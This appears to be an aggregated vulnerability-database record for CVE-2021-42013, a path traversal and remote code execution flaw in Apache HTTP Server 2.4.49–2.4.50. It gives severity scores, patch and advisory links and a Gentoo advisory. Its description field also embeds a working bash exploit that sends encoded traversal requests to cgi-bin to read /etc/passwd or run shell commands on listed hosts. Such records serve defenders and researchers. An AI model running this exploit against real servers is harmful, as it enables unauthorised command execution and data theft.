ID

VAR-202110-1690


CVE

CVE-2021-42013


TITLE

Apache HTTP Server  directory traversal vulnerability in

Trust: 0.8

sources: JVNDB: JVNDB-2021-000090

DESCRIPTION

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. This vulnerability information is reported directly to the product developer by the following person, and after coordination with the product developer, the purpose is to inform the product user. JVN It was announced at. Reporter : Internet Initiative Co., Ltd. Shugo Kumasaka Mr"" placed outside the document root by a remote third party. require all denied ” may allow unprotected files to be accessed. The server is fast, reliable and extensible through a simple API. A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193) A NULL pointer dereference in httpd allows an unauthenticated remote malicious user to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798) An out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated malicious user to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160) An out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote malicious user to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275) A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated malicious user to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438) While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524) A path transversal flaw was found in Apache 2.4.49. Additionally this flaw could leak the source of interpreted files like CGI scripts. Additionally, this flaw could leak the source of interpreted files like CGI scripts. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013). # Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) # Date: 10/05/2021 # Exploit Author: Lucas Souza https://lsass.io # Vendor Homepage: https://apache.org/ # Version: 2.4.50 # Tested on: 2.4.50 # CVE : CVE-2021-42013 # Credits: Ash Daulton and the cPanel Security Team #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] echo ./PoC.sh targets.txt /etc/passwd echo ./PoC.sh targets.txt /bin/sh id exit fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done # PoC.sh targets.txt /etc/passwd # PoC.sh targets.txt /bin/sh whoami . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202208-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Apache HTTPD: Multiple Vulnerabilities Date: August 14, 2022 Bugs: #813429, #816399, #816864, #829722, #835131, #850622 ID: 202208-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======= Multiple vulnerabilities have been discovered in Apache Webserver, the worst of which could result in remote code execution. Affected packages ================ ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-admin/apache-tools < 2.4.54 >= 2.4.54 2 www-servers/apache < 2.4.54 >= 2.4.54 Description ========== Multiple vulnerabilities have been discovered in Apache HTTPD. Please review the CVE identifiers referenced below for details. Impact ===== Please review the referenced CVE identifiers for details. Workaround ========= There is no known workaround at this time. Resolution ========= All Apache HTTPD users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.54" All Apache HTTPD tools users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/apache-tools-2.4.54" References ========= [ 1 ] CVE-2021-33193 https://nvd.nist.gov/vuln/detail/CVE-2021-33193 [ 2 ] CVE-2021-34798 https://nvd.nist.gov/vuln/detail/CVE-2021-34798 [ 3 ] CVE-2021-36160 https://nvd.nist.gov/vuln/detail/CVE-2021-36160 [ 4 ] CVE-2021-39275 https://nvd.nist.gov/vuln/detail/CVE-2021-39275 [ 5 ] CVE-2021-40438 https://nvd.nist.gov/vuln/detail/CVE-2021-40438 [ 6 ] CVE-2021-41524 https://nvd.nist.gov/vuln/detail/CVE-2021-41524 [ 7 ] CVE-2021-41773 https://nvd.nist.gov/vuln/detail/CVE-2021-41773 [ 8 ] CVE-2021-42013 https://nvd.nist.gov/vuln/detail/CVE-2021-42013 [ 9 ] CVE-2021-44224 https://nvd.nist.gov/vuln/detail/CVE-2021-44224 [ 10 ] CVE-2021-44790 https://nvd.nist.gov/vuln/detail/CVE-2021-44790 [ 11 ] CVE-2022-22719 https://nvd.nist.gov/vuln/detail/CVE-2022-22719 [ 12 ] CVE-2022-22720 https://nvd.nist.gov/vuln/detail/CVE-2022-22720 [ 13 ] CVE-2022-22721 https://nvd.nist.gov/vuln/detail/CVE-2022-22721 [ 14 ] CVE-2022-23943 https://nvd.nist.gov/vuln/detail/CVE-2022-23943 [ 15 ] CVE-2022-26377 https://nvd.nist.gov/vuln/detail/CVE-2022-26377 [ 16 ] CVE-2022-28614 https://nvd.nist.gov/vuln/detail/CVE-2022-28614 [ 17 ] CVE-2022-28615 https://nvd.nist.gov/vuln/detail/CVE-2022-28615 [ 18 ] CVE-2022-29404 https://nvd.nist.gov/vuln/detail/CVE-2022-29404 [ 19 ] CVE-2022-30522 https://nvd.nist.gov/vuln/detail/CVE-2022-30522 [ 20 ] CVE-2022-30556 https://nvd.nist.gov/vuln/detail/CVE-2022-30556 [ 21 ] CVE-2022-31813 https://nvd.nist.gov/vuln/detail/CVE-2022-31813 Availability =========== This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202208-20 Concerns? ======== Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ====== Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5

Trust: 2.43

sources: NVD: CVE-2021-42013 // JVNDB: JVNDB-2021-000090 // CNVD: CNVD-2022-03220 // VULMON: CVE-2021-42013 // PACKETSTORM: 164501 // PACKETSTORM: 168072

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2022-03220

AFFECTED PRODUCTS

vendor:apachemodel:http serverscope:eqversion:2.4.50

Trust: 1.6

vendor:apachemodel:http serverscope:eqversion:2.4.49

Trust: 1.6

vendor:netappmodel:cloud backupscope:eqversion: -

Trust: 1.0

vendor:oraclemodel:jd edwards enterpriseone toolsscope:ltversion:9.2.6.0

Trust: 1.0

vendor:oraclemodel:secure backupscope:ltversion:18.1.0.1.0

Trust: 1.0

vendor:oraclemodel:instantis enterprisetrackscope:eqversion:17.1

Trust: 1.0

vendor:fedoraprojectmodel:fedorascope:eqversion:34

Trust: 1.0

vendor:fedoraprojectmodel:fedorascope:eqversion:35

Trust: 1.0

vendor:oraclemodel:instantis enterprisetrackscope:eqversion:17.3

Trust: 1.0

vendor:oraclemodel:instantis enterprisetrackscope:eqversion:17.2

Trust: 1.0

vendor:日立model:日立高信頼サーバ rv3000scope: - version: -

Trust: 0.8

vendor:apachemodel:http serverscope: - version: -

Trust: 0.8

sources: CNVD: CNVD-2022-03220 // JVNDB: JVNDB-2021-000090 // NVD: CVE-2021-42013

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2021-42013
value: CRITICAL

Trust: 1.0

IPA: JVNDB-2021-000090
value: HIGH

Trust: 0.8

CNVD: CNVD-2022-03220
value: HIGH

Trust: 0.6

CNNVD: CNNVD-202110-413
value: CRITICAL

Trust: 0.6

VULMON: CVE-2021-42013
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2021-42013
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.1

IPA: JVNDB-2021-000090
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2022-03220
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2021-42013
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

IPA: JVNDB-2021-000090
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2022-03220 // VULMON: CVE-2021-42013 // JVNDB: JVNDB-2021-000090 // CNNVD: CNNVD-202110-413 // NVD: CVE-2021-42013

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

problemtype:CWE-22

Trust: 1.0

problemtype:Path traversal (CWE-22) [IPA evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2021-000090 // NVD: CVE-2021-42013

THREAT TYPE

remote

Trust: 0.8

sources: PACKETSTORM: 165089 // PACKETSTORM: 168072 // CNNVD: CNNVD-202110-413

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-202110-413

PATCH

title:hitachi-sec-2023-217url:https://downloads.apache.org/httpd/CHANGES_2.4.51

Trust: 0.8

title:Patch for Apache HTTP Server Directory Traversal Vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/313141

Trust: 0.6

title:Apache HTTP Server Repair measures for path traversal vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=165084

Trust: 0.6

title:Red Hat: CVE-2021-42013url:https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2021-42013

Trust: 0.1

title:Arch Linux Advisories: [ASA-202110-1] apache: directory traversalurl:https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories&qid=ASA-202110-1

Trust: 0.1

title:Arch Linux Issues: url:https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues&qid=CVE-2021-42013 log

Trust: 0.1

title:Cisco: Apache HTTP Server Vulnerabilties: October 2021url:https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-apache-httpd-pathtrv-LAzg68cZ

Trust: 0.1

title:Amazon Linux AMI: ALAS-2021-1543url:https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami&qid=ALAS-2021-1543

Trust: 0.1

title:Amazon Linux 2: ALAS2-2021-1716url:https://vulmon.com/vendoradvisory?qidtp=amazon_linux2&qid=ALAS2-2021-1716

Trust: 0.1

title:Apache 2.4.50 - Path Traversal or Remote Code Execution Vulnerable Configurations in httpd.conf Lab for CVE-2021-42013 Usage cve-2021-42013.pyurl:https://github.com/mightysai1997/cve-2021-42013.get

Trust: 0.1

title:Apache 2.4.50 - Path Traversal or Remote Code Execution Vulnerable Configurations in httpd.conf Lab for CVE-2021-42013 Usage cve-2021-42013.pyurl:https://github.com/walnutsecurity/CVE-2021-42013

Trust: 0.1

title:Usage cve-2021-42013.pyurl:https://github.com/imhunterand/CVE-2021-42013

Trust: 0.1

title:CVE-2021-42013url:https://github.com/viliuspovilaika/cve-2021-42013

Trust: 0.1

title:Apache 2.4.50 - Path Traversal or Remote Code Execution Vulnerable Configurations in httpd.conf Lab for CVE-2021-42013 Usage cve-2021-42013.pyurl:https://github.com/mightysai1997/cve-2021-42013

Trust: 0.1

title:Lab for CVE-2021-42013url:https://github.com/Turzum/ps-lab-cve-2021-42013

Trust: 0.1

title:CVE-2021-42013 Vulnerable serviceurl:https://github.com/12345qwert123456/CVE-2021-42013

Trust: 0.1

title:CVE-2021-42013 - Apache HTTP Server 2.4.50 Cara Menjalankan Lab CVE-2021-42013-Path Traversal Cara Menjalankan Lab CVE-2021-42013-RCEurl:https://github.com/BincangSiber/CVE-2021-42013

Trust: 0.1

title:CVE-2021-42013-LABurl:https://github.com/jas9reet/CVE-2021-42013-LAB

Trust: 0.1

title:Apache 2.4.50 - Path Traversal or Remote Code Execution Vulnerable Configurations in httpd.conf Lab for CVE-2021-42013 Usage cve-2021-42013.pyurl:https://github.com/walnutsecurity/cve-2021-42013

Trust: 0.1

title:CVE-2021-42013 - Apache HTTP Server 2.4.50 Cara Menjalankan Lab CVE-2021-42013-Path Traversal Cara Menjalankan Lab CVE-2021-42013-RCEurl:https://github.com/LayarKacaSiber/CVE-2021-42013

Trust: 0.1

title:Advent-of-Cyber-3-2021-url:https://github.com/ibrahimetecicek/Advent-of-Cyber-3-2021-

Trust: 0.1

title:CVE-2021-42013-ApacheRCEurl:https://github.com/xMohamed0/CVE-2021-42013-ApacheRCE

Trust: 0.1

title:Dockerisation d'une Vulnérabilité : cve-2021-42013url:https://github.com/cybfar/cve-2021-42013-httpd

Trust: 0.1

title:CVE-2021-42013 Apache 2.4.50 vulnerabilityurl:https://github.com/Hamesawian/CVE-2021-42013

Trust: 0.1

title:cve-2021-42013url:https://github.com/mightysai1997/cve-2021-42013L

Trust: 0.1

title:cve-2021-42013url:https://github.com/Vulnmachines/cve-2021-42013

Trust: 0.1

title:Read Meurl:https://github.com/Mallaichte/efed-management-system

Trust: 0.1

title:Container-Security (Docker & Kubernetes)url:https://github.com/Vamckis/Container-Security

Trust: 0.1

title:CVE-2021-42013url:https://github.com/theykillmeslowly/CVE-2021-42013

Trust: 0.1

title:Project Titleurl:https://github.com/mightysai1997/-apache_2.4.50

Trust: 0.1

title:CVE-2021-42013url:https://github.com/cryst4lliz3/CVE-2021-42013

Trust: 0.1

title:CVE-2021-42013_Reverse-Shellurl:https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell

Trust: 0.1

title:Apache HTTP Server 2.4.50 LFI & RCEurl:https://github.com/hadrian3689/apache_2.4.50

Trust: 0.1

title:CVE-2021-42013url:https://github.com/TheLastVvV/CVE-2021-42013

Trust: 0.1

title:Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) Credits: Ash Daulton & cPanel Security Team Date: 24/07/2021 Exploit Author: TheLastVvV.com Vendor Homepage: https://apache.org/ Version: Apache 2.4.50 with CGI enable Tested on : Debian 5.10.28 CVE : CVE-2021-42013url:https://github.com/Luke-cmd/sharecode

Trust: 0.1

title:comp.sec.300.2021.2022url:https://github.com/codinglikejesus/comp.sec.300.2021.2022

Trust: 0.1

title:apache-exploit-CVE-2021-42013url:https://github.com/andrea-mattioli/apache-exploit-CVE-2021-42013

Trust: 0.1

title:https://github.com/ralvares/security-demosurl:https://github.com/ralvares/security-demos

Trust: 0.1

title:CVE-2021-42013url:https://github.com/rnsss/CVE-2021-42013

Trust: 0.1

title:CVE-2021-42013url:https://github.com/khidhir-ibrahim/CVE-2021-42013

Trust: 0.1

title:cve-2021-42013url:https://github.com/Rubikcuv5/cve-2021-42013

Trust: 0.1

title:CVE-2021-42013url:https://github.com/twseptian/CVE-2021-42013-Docker-Lab

Trust: 0.1

title:https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-POC-EXPurl:https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP

Trust: 0.1

sources: CNVD: CNVD-2022-03220 // VULMON: CVE-2021-42013 // JVNDB: JVNDB-2021-000090 // CNNVD: CNNVD-202110-413

EXTERNAL IDS

db:NVDid:CVE-2021-42013

Trust: 3.4

db:JVNid:JVN51106450

Trust: 2.4

db:PACKETSTORMid:164501

Trust: 1.7

db:PACKETSTORMid:164941

Trust: 1.6

db:PACKETSTORMid:164629

Trust: 1.6

db:PACKETSTORMid:167397

Trust: 1.6

db:PACKETSTORMid:164609

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/08/2

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/15/3

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/07/6

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/09/1

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/08/6

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/16/1

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/08/1

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/08/5

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/11/4

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/08/4

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2021/10/08/3

Trust: 1.6

db:PACKETSTORMid:165089

Trust: 1.1

db:JVNDBid:JVNDB-2021-000090

Trust: 0.8

db:PACKETSTORMid:168072

Trust: 0.7

db:CNVDid:CNVD-2022-03220

Trust: 0.6

db:EXPLOIT-DBid:50512

Trust: 0.6

db:EXPLOIT-DBid:50446

Trust: 0.6

db:EXPLOIT-DBid:50406

Trust: 0.6

db:AUSCERTid:ESB-2021.3348

Trust: 0.6

db:CS-HELPid:SB2021101513

Trust: 0.6

db:CS-HELPid:SB2022042513

Trust: 0.6

db:CS-HELPid:SB2021100718

Trust: 0.6

db:CS-HELPid:SB2021100802

Trust: 0.6

db:CXSECURITYid:WLB-2021100131

Trust: 0.6

db:CXSECURITYid:WLB-2021110108

Trust: 0.6

db:CNNVDid:CNNVD-202110-413

Trust: 0.6

db:VULMONid:CVE-2021-42013

Trust: 0.1

sources: CNVD: CNVD-2022-03220 // VULMON: CVE-2021-42013 // JVNDB: JVNDB-2021-000090 // PACKETSTORM: 165089 // PACKETSTORM: 164501 // PACKETSTORM: 168072 // CNNVD: CNNVD-202110-413 // NVD: CVE-2021-42013

REFERENCES

url:http://packetstormsecurity.com/files/164501/apache-http-server-2.4.50-path-traversal-code-execution.html

Trust: 2.2

url:http://packetstormsecurity.com/files/165089/apache-http-server-2.4.50-cve-2021-42013-exploitation.html

Trust: 2.2

url:http://packetstormsecurity.com/files/167397/apache-2.4.50-remote-code-execution.html

Trust: 2.2

url:http://packetstormsecurity.com/files/164941/apache-http-server-2.4.50-remote-code-execution.html

Trust: 2.2

url:http://packetstormsecurity.com/files/164629/apache-2.4.49-2.4.50-traversal-remote-code-execution.html

Trust: 2.2

url:https://www.oracle.com/security-alerts/cpuapr2022.html

Trust: 2.2

url:https://security.gentoo.org/glsa/202208-20

Trust: 1.7

url:https://httpd.apache.org/security/vulnerabilities_24.html

Trust: 1.6

url:https://security.netapp.com/advisory/ntap-20211029-0009/

Trust: 1.6

url:https://www.oracle.com/security-alerts/cpujan2022.html

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/16/1

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/15/3

Trust: 1.6

url:http://packetstormsecurity.com/files/164609/apache-http-server-2.4.50-remote-code-execution.html

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/4

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/3

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/2

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/09/1

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/1

Trust: 1.6

url:https://www.povilaika.com/apache-2-4-50-exploit/

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/6

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/07/6

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/5

Trust: 1.6

url:http://jvn.jp/en/jp/jvn51106450/index.html

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/11/4

Trust: 1.6

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-

Trust: 1.2

url:https://lists.apache.org/thread.html/r7c795cd45a3384d4d27e57618a215b0ed19cb6ca8eb070061ad5d837%40%3cannounce.apache.org%3e

Trust: 1.0

url:https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rmiiefinl6fuiopd2a3m5xc6dh45y3cc/

Trust: 1.0

url:https://lists.apache.org/thread.html/rb5b0e46f179f60b0c70204656bc52fcb558e961cb4d06a971e9e3efb%40%3cusers.httpd.apache.org%3e

Trust: 1.0

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-httpd-pathtrv-lazg68cz

Trust: 1.0

url:https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ws5rvhoiirecg65zbtzy7iejvwqsqpg3/

Trust: 1.0

url:https://lists.apache.org/thread.html/r17a4c6ce9aff662efd9459e9d1850ab4a611cb23392fc68264c72cb3%40%3ccvs.httpd.apache.org%3e

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2021-42013

Trust: 0.9

url:https://jvn.jp/jp/jvn51106450/index.html

Trust: 0.8

url:https://www.ipa.go.jp/security/ciadr/vul/alert20211006.html

Trust: 0.8

url:https://www.jpcert.or.jp/at/2021/at210043.html

Trust: 0.8

url:https://lists.apache.org/thread.html/r7c795cd45a3384d4d27e57618a215b0ed19cb6ca8eb070061ad5d837@%3cannounce.apache.org%3e

Trust: 0.6

url:httpd.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/r17a4c6ce9aff662efd9459e9d1850ab4a611cb23392fc68264c72cb3@%3ccvs.

Trust: 0.6

url:https://lists.apache.org/thread.html/rb5b0e46f179f60b0c70204656bc52fcb558e961cb4d06a971e9e3efb@%3cusers.

Trust: 0.6

url:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rmiiefinl6fuiopd2a3m5xc6dh45y3cc/

Trust: 0.6

url:httpd.apache.org/security/vulnerabilities_24.html

Trust: 0.6

url:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ws5rvhoiirecg65zbtzy7iejvwqsqpg3/

Trust: 0.6

url:https://access.redhat.com/security/cve/cve-2021-42013

Trust: 0.6

url:https://cxsecurity.com/issue/wlb-2021100131

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2021100718

Trust: 0.6

url:https://www.exploit-db.com/exploits/50406

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2021.3348

Trust: 0.6

url:https://www.exploit-db.com/exploits/50446

Trust: 0.6

url:https://www.exploit-db.com/exploits/50512

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2022042513

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2021101513

Trust: 0.6

url:https://vigilance.fr/vulnerability/apache-http-server-2-4-49-50-directory-traversal-via-alias-like-directives-36614

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2021100802

Trust: 0.6

url:https://cxsecurity.com/issue/wlb-2021110108

Trust: 0.6

url:httpd-pathtrv-lazg68cz

Trust: 0.6

url:https://packetstormsecurity.com/files/168072/gentoo-linux-security-advisory-202208-20.html

Trust: 0.6

url:https://lsass.io

Trust: 0.1

url:https://apache.org/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-22721

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-28614

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-31813

Trust: 0.1

url:https://bugs.gentoo.org.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-29404

Trust: 0.1

url:https://creativecommons.org/licenses/by-sa/2.5

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-44790

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-28615

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-30522

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-41773

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-41524

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-44224

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-22719

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-40438

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-30556

Trust: 0.1

url:https://security.gentoo.org/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-36160

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-34798

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-23943

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-39275

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-22720

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33193

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-26377

Trust: 0.1

sources: CNVD: CNVD-2022-03220 // JVNDB: JVNDB-2021-000090 // PACKETSTORM: 165089 // PACKETSTORM: 164501 // PACKETSTORM: 168072 // CNNVD: CNNVD-202110-413 // NVD: CVE-2021-42013

CREDITS

Valentin Lobstein

Trust: 0.6

sources: CNNVD: CNNVD-202110-413

SOURCES

db:CNVDid:CNVD-2022-03220
db:VULMONid:CVE-2021-42013
db:JVNDBid:JVNDB-2021-000090
db:PACKETSTORMid:165089
db:PACKETSTORMid:164501
db:PACKETSTORMid:168072
db:CNNVDid:CNNVD-202110-413
db:NVDid:CVE-2021-42013

LAST UPDATE DATE

2024-11-23T19:54:24.693000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2022-03220date:2022-01-13T00:00:00
db:VULMONid:CVE-2021-42013date:2023-11-07T00:00:00
db:JVNDBid:JVNDB-2021-000090date:2023-12-12T07:40:00
db:CNNVDid:CNNVD-202110-413date:2022-08-16T00:00:00
db:NVDid:CVE-2021-42013date:2024-11-21T06:27:04.317

SOURCES RELEASE DATE

db:CNVDid:CNVD-2022-03220date:2021-01-12T00:00:00
db:VULMONid:CVE-2021-42013date:2021-10-07T00:00:00
db:JVNDBid:JVNDB-2021-000090date:2021-10-08T00:00:00
db:PACKETSTORMid:165089date:2021-11-29T18:03:21
db:PACKETSTORMid:164501date:2021-10-13T15:03:24
db:PACKETSTORMid:168072date:2022-08-15T16:02:48
db:CNNVDid:CNNVD-202110-413date:2021-10-07T00:00:00
db:NVDid:CVE-2021-42013date:2021-10-07T16:15:09.270